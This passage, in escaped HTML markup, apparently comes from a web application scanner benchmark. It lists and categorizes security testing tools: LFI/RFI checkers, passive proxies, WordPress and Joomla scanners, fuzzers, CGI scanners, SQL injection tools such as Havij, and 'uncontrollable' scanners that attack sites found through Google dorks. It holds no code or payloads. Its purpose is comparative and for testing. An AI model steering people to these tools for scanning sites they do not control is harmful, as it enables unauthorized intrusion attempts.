&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;a href=&quot;http://dl.packetstormsecurity.net/UNIX/scanners/lfi-rfi2.txt&quot;&gt;&lt;b&gt;lfi-rfi2&lt;/b&gt;&lt;/a&gt;&lt;b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72.0pt; mso-add-space: auto; mso-list: l2 level2 lfo6; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;LFI/RFI Checker
(astalavista)&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72.0pt; mso-add-space: auto; mso-list: l2 level2 lfo6; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;a href=&quot;https://www.owasp.org/index.php/Category:OWASP_CSRFTester_Project&quot;&gt;&lt;b&gt;CSRF
Tester&lt;/b&gt;&lt;/a&gt;&lt;b&gt; &lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72.0pt; mso-add-space: auto; mso-list: l2 level2 lfo6; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;etc&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;mso-list: l2 level1 lfo6; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;u&gt;Passive Scanners
(response analysis without verification)&lt;/u&gt;&lt;/b&gt;&lt;u&gt;:&lt;/u&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72.0pt; mso-add-space: auto; mso-list: l2 level2 lfo6; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;a href=&quot;http://websecuritytool.codeplex.com/&quot;&gt;&lt;b&gt;Watcher&lt;/b&gt;&lt;/a&gt;&lt;b&gt;
(Fiddler Plugin by Casaba Security)&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72.0pt; mso-add-space: auto; mso-list: l2 level2 lfo6; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;a href=&quot;https://www.owasp.org/index.php/Category:OWASP_Skavenger_Project&quot;&gt;&lt;b&gt;Skavanger&lt;/b&gt;&lt;/a&gt;&lt;b&gt;
(OWASP)&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72.0pt; mso-add-space: auto; mso-list: l2 level2 lfo6; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;a href=&quot;https://www.owasp.org/index.php/Category:OWASP_Pantera_Web_Assessment_Studio_Project&quot;&gt;&lt;b&gt;Pantera&lt;/b&gt;&lt;/a&gt;&lt;b&gt;
(OWASP)&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72.0pt; mso-add-space: auto; mso-list: l2 level2 lfo6; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;a href=&quot;http://code.google.com/p/ratproxy/&quot;&gt;&lt;b&gt;Ratproxy&lt;/b&gt;&lt;/a&gt;&lt;b&gt;
(Google)&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72.0pt; mso-add-space: auto; mso-list: l2 level2 lfo6; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;a href=&quot;http://www.contextis.co.uk/resources/tools/cat/&quot;&gt;&lt;b&gt;CAT
The Manual Application Proxy&lt;/b&gt;&lt;/a&gt;&lt;b&gt; (Context)&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72.0pt; mso-add-space: auto; mso-list: l2 level2 lfo6; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;etc&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;mso-list: l2 level1 lfo6; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;u&gt;Scanners of specific
products or services (CMS scanners, Web Services Scanners, etc)&lt;/u&gt;&lt;/b&gt;&lt;u&gt;:&lt;/u&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72.0pt; mso-add-space: auto; mso-list: l2 level2 lfo6; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;WSDigger&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72.0pt; mso-add-space: auto; mso-list: l2 level2 lfo6; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;Sprajax&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72.0pt; mso-add-space: auto; mso-list: l2 level2 lfo6; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;ScanAjax&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72.0pt; mso-add-space: auto; mso-list: l2 level2 lfo6; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;Joomscan&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72.0pt; mso-add-space: auto; mso-list: l2 level2 lfo6; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;wpscan&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72.0pt; mso-add-space: auto; mso-list: l2 level2 lfo6; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;Joomlascan&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72.0pt; mso-add-space: auto; mso-list: l2 level2 lfo6; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;Joomsq&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72.0pt; mso-add-space: auto; mso-list: l2 level2 lfo6; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;WPSqli&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72.0pt; mso-add-space: auto; mso-list: l2 level2 lfo6; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;etc&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;mso-list: l2 level1 lfo6; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;u&gt;Web Application Scanning
Tools which are using&lt;b&gt; Dynamic Runtime Analysis&lt;/b&gt;:&lt;/u&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72.0pt; mso-add-space: auto; mso-list: l2 level2 lfo6; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;PuzlBox &lt;/b&gt;(the free version was removed from the web site, and
is now sold as a commercial product named &lt;a href=&quot;http://www.autosectools.com/Software&quot;&gt;PHP Vulnerability Hunter&lt;/a&gt;)&lt;b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72.0pt; mso-add-space: auto; mso-list: l2 level2 lfo6; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;a href=&quot;http://code.google.com/p/inspathx/&quot;&gt;&lt;b&gt;Inspathx&lt;/b&gt;&lt;/a&gt;&lt;b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72.0pt; mso-add-space: auto; mso-list: l2 level2 lfo6; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;etc&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;mso-list: l2 level1 lfo6; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;u&gt;Uncontrollable
Scanners&lt;/u&gt;&lt;/b&gt; - scanners that can’t be controlled or restricted to scan a
single site, since they either receive the list of URLs to scan from Google
Dork, or continue and scan external sites that are linked to the tested site.
This list currently includes the following tools (and might include more):&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72.0pt; mso-add-space: auto; mso-list: l2 level2 lfo6; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;Darkjumper 5.8 &lt;/b&gt;(scans
additional external hosts that are linked to the given tested host)&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72.0pt; mso-add-space: auto; mso-list: l2 level2 lfo6; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;Bako&#39;s SQL Injection
Scanner&lt;/b&gt; &lt;b&gt;2.2&lt;/b&gt; (only tests sites from a google dork)&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72.0pt; mso-add-space: auto; mso-list: l2 level2 lfo6; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;Serverchk&lt;/b&gt; (only
tests sites from a google dork)&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72.0pt; mso-add-space: auto; mso-list: l2 level2 lfo6; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;XSS Scanner &lt;/b&gt;by&lt;b&gt;
Xylitol&lt;/b&gt; (only tests sites from a google dork)&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72.0pt; mso-add-space: auto; mso-list: l2 level2 lfo6; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;Hexjector&lt;/b&gt; by&lt;b&gt; hkhexon &lt;/b&gt;– also falls into other
categories&lt;b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72.0pt; mso-add-space: auto; mso-list: l2 level2 lfo6; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;d0rk3r&lt;/b&gt; by &lt;b&gt;b4ltazar&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72.0pt; mso-add-space: auto; mso-list: l2 level2 lfo6; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;etc&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;mso-list: l2 level1 lfo6; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;u&gt;Deprecated Scanners&lt;/u&gt;&lt;/b&gt;
- incomplete tools that were not maintained for a very long time. This list
currently includes the following tools (and might include more):&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72.0pt; mso-add-space: auto; mso-list: l2 level2 lfo6; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;Wpoison&lt;/b&gt; (development
stopped in 2003, the new official version was never released, although the 2002
development version can be obtained by manually composing the sourceforge URL which
does not appear in the web site- &lt;a href=&quot;http://sourceforge.net/projects/wpoison/files/&quot;&gt;http://sourceforge.net/projects/wpoison/files/&lt;/a&gt;
)&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72.0pt; mso-add-space: auto; mso-list: l2 level2 lfo6; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;etc&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;mso-list: l2 level1 lfo6; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;u&gt;De facto Fuzzers&lt;/u&gt;&lt;/b&gt;
– tools that scan applications in a similar way to a scanner, but where the scanner
attempts to conclude whether or not the application or is vulnerable (according
to some sort of “intelligent” set of rules), the fuzzer simply collects
abnormal responses to various inputs and behaviors, leaving the task of
concluding to the human user. &lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72.0pt; mso-add-space: auto; mso-list: l2 level2 lfo6; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;Lilith 0.4c/0.6a &lt;/b&gt;(both
versions 0.4c and 0.6a were tested, and although the tool seems to be a scanner
at first glimpse, it doesn’t perform any intelligent analysis on the results).&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72.0pt; mso-add-space: auto; mso-list: l2 level2 lfo6; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;Spike proxy&lt;/b&gt; &lt;b&gt;1.48&lt;/b&gt;
(although the tool has XSS and SQLi scan features, it acts like a fuzzer more
then it acts like a scanner – it sends payloads of partial XSS and SQLi, and
does not verify that the context of the returned output is sufficient for
execution or that the error presented by the server is related to a database syntax
injection, leaving the verification task for the user).&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;mso-list: l2 level1 lfo6; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;u&gt;Fuzzers&lt;/u&gt;&lt;/b&gt; –
scanning tools that lack the independent ability to conclude whether a given response
represents a vulnerable location, by using some sort of verification method (this
category includes tools such as JBroFuzz, Firefuzzer, Proxmon, st4lk3r, etc).
Fuzzers that had at least one type of exposure that was verified were included
in the benchmark (Powerfuzzer).&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;mso-list: l2 level1 lfo6; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;u&gt;CGI Scanners&lt;/u&gt;:&lt;/b&gt;
vulnerability scanners that focus on detecting hardening flaws and version
specific hazards in web infrastructures (Nikto, Wikto, WHCC, st4lk3r,
N-Stealth, etc)&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;mso-list: l2 level1 lfo6; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;u&gt;Single URL
Vulnerability Scanners&lt;/u&gt;&lt;/b&gt; - scanners that can only scan one URL at a time,
or can only scan information from a google dork (uncontrollable).&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72.0pt; mso-add-space: auto; mso-list: l2 level2 lfo6; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;Havij (by itsecteam.com)&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72.0pt; mso-add-space: auto; mso-list: l2 level2 lfo6; text-indent: -18.0pt;&quot;&gt;
